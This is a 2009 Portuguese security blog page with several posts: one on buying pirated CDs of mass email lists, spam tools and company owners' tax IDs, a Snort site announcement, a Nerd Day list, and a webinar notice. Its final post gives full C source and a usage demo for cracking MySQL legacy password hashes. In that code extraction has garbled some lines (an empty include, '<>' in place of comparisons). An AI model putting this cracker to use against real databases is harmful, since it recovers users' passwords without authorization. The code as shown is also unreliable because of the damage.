quinta-feira, 28 de maio de 2009

Torne-se um spammer com apenas 20 reais




Caminhando pelo centro de São Paulo vi em uma daquelas barraquinhas que vende
CDs piratas um CD intitulado "45 milhões de emails"... Opa.. interessante hein
perguntei para o garoto que cuidava da barraca o que mais de CD ele possuia nesste mesmo gênero...
Então ele começou a me mostrar...
- CD com detalhes de diversas empresas no estado de São Paulo (inclusive contendo CNPJ e CPF dos sócios)
- CD com o título "como se tornar hacker" (esse deu até medo rsrs) segundo o garoto da barraca ele continha diversas ferramentas para roubo de senha e listas com senhas de emails, msn, perfis de Orkut, etc...
E o que me deu mais medo foi um DVD com o cadastro de todos os CPFs e CNPJs cadastrados na receita federal (esse inclusive contendo dados do imposto de renda das pessoas).
Show de bola vamos ver o que encontramos..rsrs
comprei o CD com os 45 milhoes de emails e o cd com cadastro das empresas paulistas...
Primeiro vamos ver o CD com os emails... será que acho meu email aqui? rsrs
O CD é muito bem organizado, dividido em pessoas físicas e jurídicas, 400 mil emails do IG, mais de 415 mil emails do hotmail mas o meu email não esta em nenhum deles... ufaa!!! alívio...
O interessante do CD com os emails é que também vem vários programinhas pra envio de spam, ops mala direta..rsrs
Agora vamos ao CD com os dados das empresas de São Paulo... o legal é que neste CD você já ganha inteiramente "de grátis" e sem nenhum custo adicional 10 arquivos infectados com trojans....rsrs
Maravilha hein...rsrs Mas vamos ao que interessa... boot na maquina virtual e install no CD.....
Mais uma vez a tensão... será que meu nome esta nesta lista? huahua
Ufaaaa também me safei desta..rsrs mas o legal deste CD é que você pode dar um search pelo nome da empresa e ver a lista de sócios com seus respectivos CPF, data de nascimento, endereço e cargo.. show de bola hein.. prato cheio para as mentes perigosas...
e tudo isso com apenas 20 reais hein..
Agora me vem a seguinte pergunta na cabeça... será que estes CDs tem boa saida? estes CD possuem informações extremamente sigilosas e em poder de pessoas sem escrúpulos podem gerar muito prejuízo e dor de cabeça.
Como se defender destes perigos..rsrsrs

Ps.
Por favor não comprem estes CD para utiliza-los para o mal....


[]s
By CleBeeR |_b

Novo site do Snort


Esta no ar o novo site do snort com novo layout, o novo site vem no ano em que o snort comemora 10 anos de vida com mais de 3.7 milhões de downloads e mais de 244,000 usuários registrados.
Para conferir o novo site acesse:
www.snort.org

By CleBeer
Happy Snorting...

segunda-feira, 25 de maio de 2009

25 de maio é dia Internacional dos Nerd


Para os Nerd e Geeks de plantão, hoje é nosso dia.. 25 de maio é conhecido como dia internacional do orgulho nerd e para curtir ai vão nossos direitos e deveres.

  • Direitos:
  1. O direito de ser ainda mais nerd.
  2. O direito de não sair de casa.
  3. O direito de não gostar de futebol ou de qualquer outro esporte.
  4. O direito de se associar a outros nerds.
  5. O direito de ter poucos (ou nenhum) amigo.
  6. O direito de ter tantos amigos nerds quanto quiser.
  7. O direito de não ter que estar "no estilo".
  8. O direito ao sobrepeso (ou subpeso) e de ter problemas de vista.
  9. O direito de expressar sua nerdice.
  10. O direito de dominar o mundo.
  • Deveres
  1. Ser nerd, não importa o quê.
  2. Tentar ser mais nerd do que qualquer um.
  3. Se há uma discussão sobre um assunto nerd, você tem que dar sua opinião.
  4. Guardar todo e qualquer objeto nerd que você tenha.
  5. Fazer todo o possível para exibir seus objetos nerds como se fosse um "museu da nerdice".
  6. Não ser um nerd genérico. Você tem que ser especialista em algo.
  7. Assistir a qualquer filme nerd na noite de estréia e comprar qualquer livro nerd antes de todo mundo.
  8. Esperar na fila em toda noite de estréia. Se puder ir fantasiado, ou pelo menos com uma camisa relacionada ao tema, melhor ainda.
  9. Não perder seu tempo em nada que não seja relacionado à nerdice.
  10. Tentar dominar o mundo!

E para curtir veja a seguir uns sinais geeks bem legais

Feliz dia dos Nerds.
By CleBeer

quinta-feira, 7 de maio de 2009

Webminar Overview redes e snort (pt_BR)

Caros,
A Dynsec ( http://www.dynsec.com.br ) fará um webminar inicial sobre os topicos abaixo:

- Introdução redes
- Protocolos ( tcp,ip, udp, icmp, http, ssh, smtp, pop3, imap ..... e pequeno correlacionamento com os pré processadores existentes)
- Overview funcionamento snort
- Equipamentos
- Ataques

A idéia é nivelar um pouco todos da lista e mostrar importancia de entendimento de funcionamento e protocolos.

O webminar acontecerá terça feira (12/05) às 20:00h (horário Brasilia) e terá duração de 1 hora. O webminar terá nessa edição como speakers o Marcos Aurélio(Dynsec), Rodrigo Montoro (Dynsec) e eu Cleber Brandão (BRconnection).
Quem se interessar enviar o e-mail para [email protected]


Happy Snorting!

By Clebeer

segunda-feira, 4 de maio de 2009

Quebrando senhas do MySQL.

Fuçando na Net achei um código bem legal de como quebrar senhas armazenadas no MySQL.
Como isso funciona? As senhas de usuários armazenadas em um banco MySQL (geralmente) são armazenadas em hash, ou seja se eu tenho acesso ao banco e dou um select no campo de password do usuário "fulano" eo resultado seria como a seguir:

mysql> SELECT PASSWORD('fulano');
+--------------------+
| PASSWORD('fulano') |
+--------------------+
| 6f8c114b58f2ce9e |
+--------------------+
Aqui vemos apenas o hash da senha ae entra o código que achei para nos auxiliar a descobrir a senha deste usuário.

executamos o comando (já compilado)

[localhost~] $ ./MysqlCrack 6f8c114b58f2ce9e
Hash: 6f8c114b58f2ce9e
Trying length 3
Trying length 4
Trying length 5
Trying length 6
Found pass: mypass

Aeee a senha do usuário fulano é "mypass"... rsrsrs
Fácil né?
Abaixo segue o código fonte do programa, para compilar basta executar o seguinte comando:
[localhost~]$ gcc -o MysqlCrack MysqlCrac.c

---Corte---
/* This program is public domain. Share and enjoy.
*
* Example:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/

#include

typedef unsigned long u32;

/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126

/* Maximum length of password */
#define MAX_LEN 12

#define MASK 0x7fffffffL

int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
int i, c;
u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
u32 newstate1, newstate2, newstate3;
u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
i = -1;
sum = 7;
state1_ary[0] = 1345345333L;
state2_ary[0] = 0x12345671L;

while (1) {
while (i < stop) {
i++;
pass_ary[i] = MIN_CHAR;
step_ary[i] = (state1_ary[i] & 0x3f) + sum;
xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
sum += MIN_CHAR;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}

state1 = state1_ary[i+1];
state2 = state2_ary[i+1];
step = (state1 & 0x3f) + sum;
xor1 = step*MIN_CHAR + (state1 << 8);
xor2 = (state2 << 8) ^ state1;

for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
newstate2 = state2 + (xor1 ^ xor2);
newstate1 = state1 ^ xor1;

newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
div = (newstate1 & 0x3f) + sum + c;
diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
if (diff % div != 0) continue;
d = diff / div;
if (d <> MAX_CHAR) continue;

div = (newstate3 & 0x3f) + sum + c + d;
diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
if (diff % div != 0) continue;
e = diff / div;
if (e <> MAX_CHAR) continue;

pass_ary[i+1] = c;
pass_ary[i+2] = d;
pass_ary[i+3] = e;
return 1;
}

while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
sum -= MAX_CHAR;
i--;
}
if (i < 0) break;
pass_ary[i]++;
xor_ary[i] += step_ary[i];
sum++;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}

return 0;
}

void crack(char *hash)
{
int i, len;
u32 targ1, targ2, targ3;
int pass[MAX_LEN];

if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
printf("Invalid password hash: %s\n", hash);
return;
}
printf("Hash: %08lx%08lx\n", targ1, targ2);
targ3 = targ2 - targ1;
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);

for (len = 3; len <= MAX_LEN; len++) {
printf("Trying length %d\n", len);
if ( crack0(len-4, targ1, targ3, pass) ) {
printf("Found pass: ");
for (i = 0; i < len; i++)
putchar(pass[i]);
putchar('\n');
break;
}
}
if (len > MAX_LEN)
printf("Pass not found\n");
}

int main(int argc, char *argv[])
{
int i;
if (argc <= 1)
printf("usage: %s hash\n", argv[0]);
for (i = 1; i < argc; i++)
crack(argv[i]);
return 0;
}
---Corte---

Aprecie com moderação... =D

By CleBeer |_b